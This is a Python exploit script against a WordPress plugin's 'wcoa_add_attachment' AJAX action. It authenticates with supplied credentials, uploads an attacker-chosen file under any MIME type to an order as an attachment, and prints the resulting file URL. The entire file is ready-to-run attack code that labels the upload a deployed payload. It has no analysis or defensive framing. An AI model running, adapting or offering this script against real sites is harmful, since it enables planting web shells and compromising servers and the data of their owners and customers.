import requests
import argparse
import json
import os

# exploit by | Nxploit | Khaled alenazi

requests.packages.urllib3.disable_warnings()

USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"

def authenticate(session, url, username, password):
    login_url = url + "/wp-login.php"
    login_data = {
        "log": username,
        "pwd": password,
        "rememberme": "forever",
        "wp-submit": "Log In"
    }
    
    print("[*] Initiating authentication...")
    response = session.post(login_url, data=login_data, verify=False, headers={"User-Agent": USER_AGENT})
    
    if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
        print("[✔] Authentication successful.")
        return True
    else:
        print("[✘] Authentication failed.")
        return False

def validate_file(file_path):
    if not os.path.exists(file_path):
        print(f"[✘] Error: File '{file_path}' not found!")
        exit()

def execute_payload(session, url, order_id, file_path, filetype):
    upload_url = url + "/wp-admin/admin-ajax.php"
    files = {
        "attachment": (file_path, open(file_path, "rb"), filetype)
    }
    data = {
        "action": "wcoa_add_attachment",
        "order_id": order_id
    }

    print(f"[*] Deploying payload: {file_path} to order {order_id}...")
    response = session.post(upload_url, files=files, data=data, verify=False, headers={"User-Agent": USER_AGENT})

    return response

def analyze_response(response):
    if response.status_code == 200:
        try:
            response_json = response.json()
            if response_json.get("status") == "success":
                file_url = response_json["data"].get("url", "Unknown")
                print(f"[✔] Payload successfully deployed!")
                print(f"🔗 File URL: {file_url}")
            else:
                print("[✘] Deployment failed.")
        except json.JSONDecodeError:
            print("[✘] Failed to parse JSON response.")
    else:
        print(f"[✘] Deployment failed! HTTP Status: {response.status_code}")

def main():
    parser = argparse.ArgumentParser(description="WordPress File Upload via wcoa_add_attachment")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL (e.g., http://example.com/wordpress4)")
    parser.add_argument("-un", "--username", required=True, help="WordPress username")
    parser.add_argument("-p", "--password", required=True, help="WordPress password")
    parser.add_argument("-o", "--order", default="196", help="Order ID to attach the file (default: 196)")
    parser.add_argument("--filename", default="Nxploit.jpg", help="File name to upload (default: Nxploit.jpg)")
    parser.add_argument("--filetype", default="image/jpeg", help="MIME type of the file (default: image/jpeg)")
    args = parser.parse_args()

    session = requests.Session()

    if not authenticate(session, args.url, args.username, args.password):
        exit()

    validate_file(args.filename)

    response = execute_payload(session, args.url, args.order, args.filename, args.filetype)

    analyze_response(response)

if __name__ == "__main__":
    main()